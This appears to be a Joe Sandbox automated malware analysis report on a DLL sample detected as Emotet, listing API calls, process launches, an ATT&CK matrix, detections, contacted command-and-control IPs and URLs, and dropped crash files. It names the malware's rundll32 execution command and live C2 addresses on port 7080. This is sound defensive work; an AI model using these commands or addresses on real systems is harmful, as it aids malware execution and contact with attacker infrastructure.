                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,CreateToolhelp32Snapshot,GetLastError,Sleep,GetModuleFileNameW,PathFindFileNameW,Module32FirstW,Module32NextW,Module32NextW,FindCloseChangeNotification,Sleep,Module32NextW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ,std::ios_base::_Ios_base_dtor, explorer.exe
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: Sleep,Module32NextW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CryptStringToBinaryW,LocalFree,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle, explorer.exe
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA=
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F547F5B cpuid
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F547CA5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F555774 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: zGeK5so94c.dll, type: SAMPLE
                    Source: Yara matchFile source: 00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 6.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.729e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5413C0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsService Execution1Windows Service1Windows Service1Masquerading2OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobApplication Shimming1Process Injection121Virtualization/Sandbox Evasion3LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Process Injection121Security Account ManagerSecurity Software Discovery51SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemSystem Information Discovery34Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 344305 Sample: zGeK5so94c Startdate: 26/01/2021 Architecture: WINDOWS Score: 88 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Antivirus / Scanner detection for submitted sample 2->66 68 Yara detected Emotet 2->68 70 3 other signatures 2->70 14 loaddll32.exe 1 2->14         started        16 svchost.exe 4 2->16         started        18 svchost.exe 1 2->18         started        20 2 other processes 2->20 process3 process4 22 rundll32.exe 14->22         started        24 WerFault.exe 3 9 14->24         started        26 WerFault.exe 16->26         started        process5 28 rundll32.exe 2 22->28         started        signatures6 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->80 31 rundll32.exe 28->31         started        process7 process8 33 rundll32.exe 13 31->33         started        dnsIp9 56 190.55.186.229, 80 TelecentroSAAR Argentina 33->56 58 203.157.152.9, 49750, 7080 MOPH-TH-APInformationTechnologyOfficeSG Thailand 33->58 54 C:\Windows\SysWOW64\Hbjpd\pixmxoo.dll, PE32 33->54 dropped 72 System process connects to network (likely due to code injection or exploit) 33->72 38 rundll32.exe 5 33->38         started        file10 signatures11 process12 signatures13 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->76 41 rundll32.exe 2 38->41         started        process14 dnsIp15 60 192.168.2.1 unknown unknown 41->60 78 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->78 45 rundll32.exe 2 41->45         started        signatures16 process17 signatures18 82 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->82 48 rundll32.exe 2 45->48         started        process19 signatures20 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 48->62 51 rundll32.exe 48->51         started        process21 signatures22 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 51->74

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    zGeK5so94c.dll100%AviraTR/ATRAPS.Gen
                    zGeK5so94c.dll100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    6.2.rundll32.exe.729e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                    4.2.rundll32.exe.729e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                    7.2.rundll32.exe.729e0000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                    5.2.rundll32.exe.729e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://203.157.152.9:7080/k8idqdr2/0%Avira URL Cloudsafe
                    http://203.157.152.9:7080/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://203.157.152.9:7080/k8idqdr2/true
                    • Avira URL Cloud: safe
                    unknown
                    http://203.157.152.9:7080/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/true
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.hulu.com/privacysvchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpfalse
                      high
                      http://www.g5e.com/G5_End_User_License_Supplemental_Termssvchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpfalse
                        high
                        https://www.hulu.com/do-not-sell-my-infosvchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpfalse
                          high
                          http://www.hulu.com/termssvchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpfalse
                            high
                            https://corp.roblox.com/contact/svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpfalse
                              high
                              https://www.roblox.com/developsvchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpfalse
                                high
                                https://instagram.com/hiddencity_svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.roblox.com/info/privacysvchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.g5e.com/termsofservicesvchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpfalse
                                      high
                                      https://en.help.roblox.com/hc/en-ussvchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpfalse
                                        high
                                        https://corp.roblox.com/parents/svchost.exe, 0000000E.00000003.766254523.000001D9CB163000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766055144.000001D9CB16C000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.hulu.com/ca-privacy-rightssvchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpfalse
                                            high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            203.157.152.9
                                            unknownThailand
                                            9649MOPH-TH-APInformationTechnologyOfficeSGtrue
                                            190.55.186.229
                                            unknownArgentina
                                            27747TelecentroSAARtrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:344305
                                            Start date:26.01.2021
                                            Start time:12:19:44
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 14m 39s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:zGeK5so94c (renamed file extension from none to dll)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:40
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal88.troj.evad.winDLL@61/8@0/3
                                            EGA Information:
                                            • Successful, ratio: 83.3%
                                            HDC Information:
                                            • Successful, ratio: 28.9% (good quality ratio 27.6%)
                                            • Quality average: 73.5%
                                            • Quality standard deviation: 24.8%
                                            HCA Information:
                                            • Successful, ratio: 86%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Stop behavior analysis, all processes terminated
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 168.61.161.212, 51.104.139.180, 95.101.22.224, 95.101.22.216, 52.155.217.156, 20.54.26.129, 51.11.168.160
                                            • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net
                                            • Execution Graph export aborted for target loaddll32.exe, PID 7100 because there are no executed function
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344305/sample/zGeK5so94c.dll

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:20:48API Interceptor1x Sleep call for process: loaddll32.exe modified
                                            12:21:22API Interceptor10x Sleep call for process: svchost.exe modified
                                            12:21:25API Interceptor560x Sleep call for process: rundll32.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            203.157.152.9Bestellung.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/
                                            Beauftragung.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/1mknma6mw3iwffexp2/
                                            Reservierung.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/6eve8qas5/0i5mfaii/p8bez9p65uc19f4/grju6ta/
                                            Beorderung.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/xjj84/c3o6r1ebhyxncr9/9sjisujiufchwydnol9/rkuxo00mhg/
                                            Bestellung.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/y4p99euagxraa4zj/2wbjd3933k44x/1is5p89u2lc009/atph/h2r0ok8wa30trloqlf9/
                                            Inv DK448.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/3lec7urzx75mbq0/jwg3osdiklskv3/
                                            Invoice S2517158.docGet hashmaliciousBrowse
                                            • 203.157.152.9:7080/nqu8y0186o53/1aptxcpbn3iz11tn/ulw3e69cw2/
                                            http://xichengkeji.top/classic-retro-l8swk/3926bosets0n4/u2cfhti77-96Get hashmaliciousBrowse
                                            • 203.157.152.9:7080/m8k9od75wi4wt2s131/ldx9ip66uu7zrrcv1qt/dx6l/aupcslxxe4sj3op4i/k3lns8t/
                                            190.55.186.229Order.docGet hashmaliciousBrowse
                                            • 190.55.186.229/efl8dd1i/
                                            N00048481397007.docGet hashmaliciousBrowse
                                            • 190.55.186.229/pvaadnb3/
                                            Invoice 6682363.docGet hashmaliciousBrowse
                                            • 190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
                                            certificado.docGet hashmaliciousBrowse
                                            • 190.55.186.229/t3u070voc/dhvfsiwa8/4hr1scfgu20pt/iroc8/mlfa/v0pznqop/
                                            SecuriteInfo.com.Mal.DocDl-K.24054.docGet hashmaliciousBrowse
                                            • 190.55.186.229/i9lbsrtqcu0eub47zf/
                                            SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                            • 190.55.186.229/jgeu/
                                            SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                            • 190.55.186.229/mlqum5rvy23mclyw98/bxc1sxq6pyd4l/glso7yy9y6j/63ww5/j94pvx/
                                            PQWX99943.docGet hashmaliciousBrowse
                                            • 190.55.186.229/b0sm4wo0eycy/enwxs3/ch9vx64v/

                                            Domains

                                            No context

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            TelecentroSAARBestellung.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            Order.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            N00048481397007.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            Invoice 6682363.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            certificado.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.24054.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.32352.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            SecuriteInfo.com.Mal.DocDl-K.460.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            PQWX99943.docGet hashmaliciousBrowse
                                            • 190.55.186.229
                                            dq1J3cjv.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            malware1.exeGet hashmaliciousBrowse
                                            • 186.19.26.230
                                            Astra.x86Get hashmaliciousBrowse
                                            • 181.45.174.122
                                            ezkQ0RtL.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            14240456646.exeGet hashmaliciousBrowse
                                            • 186.19.62.249
                                            GsQzmGULNs.exeGet hashmaliciousBrowse
                                            • 186.23.189.192
                                            43mai.exeGet hashmaliciousBrowse
                                            • 186.19.205.93
                                            27Label_00384463.doc.jsGet hashmaliciousBrowse
                                            • 181.44.194.254
                                            363evUVPRxr3.exeGet hashmaliciousBrowse
                                            • 186.19.196.93
                                            4Cc4YU01dF.sctGet hashmaliciousBrowse
                                            • 186.23.49.11
                                            http://206.189.68.184/xybt_A1sb-SMlX/qFX/Attachments/02_19Get hashmaliciousBrowse
                                            • 190.55.118.192
                                            MOPH-TH-APInformationTechnologyOfficeSGBestellung.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Beauftragung.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Reservierung.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Beorderung.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Bestellung.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Inv DK448.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            Invoice S2517158.docGet hashmaliciousBrowse
                                            • 203.157.152.9
                                            http://xichengkeji.top/classic-retro-l8swk/3926bosets0n4/u2cfhti77-96Get hashmaliciousBrowse
                                            • 203.157.152.9

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_874016c5b9dda738fcae96b92993f32a2ecc633_b4806494_128dda85\Report.wer
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):7346
                                            Entropy (8bit):3.748188985002638
                                            Encrypted:false
                                            SSDEEP:96:htIbKCW0y0y9hTX7tNfwbpXIQcQEc6ncE1cw35j+a+z+HbHgUZAXGng5FMTPSkvs:U1UcHqj/NDjy/u7s+S274ItWv
                                            MD5:4B3049739286DD1B29726F71451F44F3
                                            SHA1:F8E12E892DB0DA4507634BD155878D13D7D6E037
                                            SHA-256:CAAED14D04E974509D485C042179EDFD745CA89E070ECA11199EEB0B3986D031
                                            SHA-512:09DC3FC9ABC7ACEC1E55D6173EB029E44BE968635FB00057CE5E176E7A41A6922E5FDBE70DFB15B63AEADDD3BCE99CD4640C31417A61F3A1E7258E400B299160
                                            Malicious:false
                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.1.3.3.6.4.2.2.7.3.9.9.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.1.1.2.3.5.0.-.d.f.b.0.-.4.8.4.1.-.b.0.f.9.-.3.3.9.5.3.2.5.d.e.d.1.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.9.3.0.8.a.d.-.e.d.c.7.-.4.5.2.4.-.9.e.a.3.-.d.e.d.1.3.3.0.f.c.d.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.b.-.b.8.2.e.-.4.b.4.6.d.5.f.3.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.3.0.:.1.2.:.1.5.:.2.1.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD3DE.tmp.dmp
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 15 streams, Tue Jan 26 11:20:42 2021, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):22008
                                            Entropy (8bit):2.361260079629944
                                            Encrypted:false
                                            SSDEEP:192:GvobIioNi2HtWlOo62pQoaWJD84xl7c4vi:UxHtWfpaP+D84G
                                            MD5:4CCF5137393D458F84089E87CAAEE239
                                            SHA1:28977AE291753E370817C82F34FA91CCB9D54BC1
                                            SHA-256:D2DF381B0152AB6E2C1CF7494F79ECF7163F851F15952A84B4E03FB87493AED6
                                            SHA-512:4C6DE9E7BA35AC66C1E30E9F198BE33E2D97B8B817F2AA2E4E9266D7B204DAA70678D67E4BA61F8EB975B97DF72056AAFCD6252D7B6A82618009007435FF37B1
                                            Malicious:false
                                            Preview: MDMP....... ..........`...................U...........B......|.......GenuineIntelW...........T..............`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD575.tmp.WERInternalMetadata.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8266
                                            Entropy (8bit):3.6922097251089263
                                            Encrypted:false
                                            SSDEEP:192:Rrl7r3GLNikf6AJ6Yr8SUqsOgmfnSwV+pBH89byKsfJGm:RrlsNi86AJ6YwSUqsOgmfnSwrypfh
                                            MD5:77A02BF9B3D575ED700B174C64F81F94
                                            SHA1:8AD6B2CA6EF8ECBA268A6AEC44CB00D9A4D901B0
                                            SHA-256:1D8F644B0872D416796B40735E7CD17A49D28A1F10361F44484DDC90447FA212
                                            SHA-512:24083C1043B0904388365CAC6DE9A5738835538306CE923BA2E3E2CBB29E7E13B22DC5A7FAEE528841D7325E3CFAB34E25920D2533793808C79587B0B8031B9B
                                            Malicious:false
                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.d.>.......
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6FB.tmp.csv
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):55840
                                            Entropy (8bit):3.0469999953879663
                                            Encrypted:false
                                            SSDEEP:768:oZHtFHnEVAZJ2mhtePntJLcPVo9tzitslsp9x6fI7RM4i:oZHtFH8AZImhtInUPVo9tzitb+fz4i
                                            MD5:9E62C332404FA2489586B796FD8422D6
                                            SHA1:1CB0B4C224CA617C57AF078F520B46C046A1D48F
